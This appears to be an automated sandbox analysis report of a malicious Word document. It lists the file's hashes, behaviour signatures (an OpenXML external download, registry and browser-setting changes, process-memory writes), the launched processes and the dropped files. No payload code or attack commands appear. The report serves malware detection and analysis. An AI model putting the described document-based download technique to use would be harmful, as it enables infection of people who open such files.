Overview

overview

10

Static

static

10

0D9A51628C...E.docx

windows7-x64

7

0D9A51628C...E.docx

windows10-2004-x64

1

Analysis

  • max time kernel
    102s
  • max time network
    56s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    18/05/2023, 02:00

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    0D9A51628CB6EF7CFA6074D8C6E89F61E2321BFBB39B7CE9A2E2D1972E0E163E.docx

  • Size

    11KB

  • MD5

    c94062b9a586d15cd884246aefb0a75b

  • SHA1

    22a13b5db65f00a9e91e8c37e496df25b5276e77

  • SHA256

    0d9a51628cb6ef7cfa6074d8c6e89f61e2321bfbb39b7ce9a2e2d1972e0e163e

  • SHA512

    18c9d7f96317d483093b5966cadb82e45a2310eea351b54f928554bef8c439cfd454a5a9ba0e1fe3ea1322d798e4d3c5cb9ed7496c545af3e5d822ecdba36fdb

  • SSDEEP

    192:CtNCWUyn0i13pNXqkOcPiYFLwzvdX6Ptpwjnw+umHBCusiWVd:aNxUyn0i13LROEiOLkX6Ujnw+3VyVd

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0D9A51628CB6EF7CFA6074D8C6E89F61E2321BFBB39B7CE9A2E2D1972E0E163E.docx"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:744
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1792

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F10D4753-56BE-45E2-B640-6529254E6CD3}.FSD
            Filesize

            128KB

            MD5

            e26447a5cb5d5956a65ca5993a8bc780

            SHA1

            aebe8480ee37d9a5fdcf5a143f59d4203c93ed8a

            SHA256

            87c499fbc294056b5b3da3cb8c71a4fbbcb7874decd340401bc89df9dc688071

            SHA512

            8bdb0623446641c92893bbb7fb7be94a52acc0899413410f3ff75f56325c5714de89223e43dc7b0ff5464b71ee2aab2db9a7ea1f14afe9be9f5c69bc87bd931e

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
            Filesize

            128KB

            MD5

            9924c4bb5c977d1bfb23c215a7c8d744

            SHA1

            b04b57c855462d1777c7cf6f133258e0b17839d0

            SHA256

            e94bae6f7e455c014ec044a10b797b96834a3230a7cef781f61a18df4d0444fc

            SHA512

            ea38cbcbeaa09c1bf286964bbfbfdd1abb10a23103b204e998d106e543c60f7d3c425524275ff50ccb11b7affba71d330850b013d197561e62e7bf6bd949f298

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{F09E0D3F-A5D6-4B0A-940D-45479C9EED99}.FSD
            Filesize

            128KB

            MD5

            3936ca1f7561e95465e3fcc2ac6384ad

            SHA1

            fcb440c09884911151dace772b575277409c9d21

            SHA256

            6b3943833c36175ff850b712d94aafb2b249609e1e2cc1cb527ab99146b924d8

            SHA512

            d5b401e2bb135c691117acee4eaec29a2a82668de3351be2620eaaf483985a1bcb7129940094fb875168cbe7335e590621358e41d10604f5d72c958857db1116

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\{DCC2F599-85C8-48A2-9C15-00CBBC63CE62}
            Filesize

            128KB

            MD5

            09dd5c3062a8ff7566abde23d3399745

            SHA1

            34e5631992f915e6ac28839042afdc3bd27bf218

            SHA256

            1b5c106bfdaed1a23489601907cac58d9708458dee8ce5da898b899f0cac6d5c

            SHA512

            6e697f7c8b8b3dc9f341661613f31cfbc395bcb8b71cd18e3b8251aeb3fe2f18cec000809c06f8f7983f4ce73616fac0d94805bf6a5fb074500ef15b229cbbdc

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize

            20KB

            MD5

            ea3ceef89f5ffe9bba0c5138828633e8

            SHA1

            63d31dc3f1c4aa804f209490f1594ebf34c36cac

            SHA256

            43acdb918d364629dcb9acd6aa6ba36dca408000b673110c5ae838efe437368c

            SHA512

            3e295d0e1ee97da5aa2e13e51917e00c56d2424efd8d8acaf23ed2e4777e9b59c61f8c923b3b7b4b59af0ebb5b0ca81498a77ad8f78c61115fca4836e1b5e537

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
            Filesize

            2B

            MD5

            f3b25701fe362ec84616a93a45ce9998

            SHA1

            d62636d8caec13f04e28442a0a6fa1afeb024bbb

            SHA256

            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

            SHA512

            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

            Download Submit

          • memory/744-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/744-148-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download